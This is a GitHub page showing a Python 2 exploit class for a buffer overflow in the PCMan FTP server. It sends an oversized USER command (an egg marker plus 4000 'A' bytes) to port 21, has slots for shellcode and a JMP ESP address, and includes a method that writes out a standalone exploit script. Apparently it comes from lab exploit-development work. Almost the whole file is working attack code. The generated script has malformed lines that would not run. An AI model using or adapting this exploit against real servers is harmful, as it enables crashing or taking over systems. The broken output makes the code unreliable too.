-
Notifications
You must be signed in to change notification settings - Fork 54
/
Copy pathclass-pcman.py
110 lines (92 loc) · 2.42 KB
/
class-pcman.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
import socket, sys, struct, subprocess, os
from threading import Thread
from functools import wraps
from time import sleep
def run_async(func):
"""
function decorator, intended to make "func" run in a separate thread (asynchronously).
@return: the created Thread object
E.g.:
@run_async
def task1():
do_something
@run_async
def task2():
do_something_too
t1 = task1()
t2 = task2()
...
t1.join()
t2.join()
"""
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target = func, args = args, kwargs = kwargs)
func_hl.start()
return func_hl
return async_func
class Exploit():
"""
class that contains the exploit, and that can be used to build it
"""
def __init__(self):
self.egg = 'EGGG'
self.shellcode = ''
self.jmpesp = ''
self.prebuff = ''
self.postbuff = ''
self.buffer = [self.egg*2, "A"*4000]
self.file_based = False
self.filename = ''
self.command = 'C:\\Users\\offsec\\Desktop\\PCMan\\PCManFTPD2.exe'
@run_async
def exploit(self):
"""
This function runs the actual exploit
"""
sleep(1)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print '[*]Connecting to socket'
sock.connect(('127.0.0.1',21))
#Test 1
message = "USER " + ''.join(self.buffer) + " \r\n"
print '[*]Sending exploit'
sock.send(message)
#sleep(1)
sock.close()
def string_to_hexescaped(self,s):
"""
Takes a string and will convert each char to a printed hex escaped string, and join them together
@param s: input string
@retrun printable hex escaped string
"""
return ''.join('\\x%02x' % ord(c) for c in s)
def get_buffer(self):
return self.buffer
def set_buffer(self,buff):
self.buffer = buff
def get_buffer_length(self):
return len(''.join(self.buffer))
def get_egg(self):
return self.egg
def set_egg(self,egg):
self.egg = egg
def get_filename(self):
return self.filename
def set_filename(self,filename):
self.filename = filename
def is_filebased(self):
return self.file_based
def get_command(self):
return self.command
def save(self):
f = open('pcman_exploit.py','w')
f.write("import socket\n\n" +
"sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" +
"print '[*]Connecting to socket'" +
"sock.connect(('127.0.0.1',21))\n" +
"message = 'USER " + ''.join('\\x%02x' % ord(c) for c in ''.join(self.buffer)) + " \\r\\n'\n" +
"print '[*]Sending exploit'" +
"sock.send(message)\n" +
"sock.close()\n")
f.close()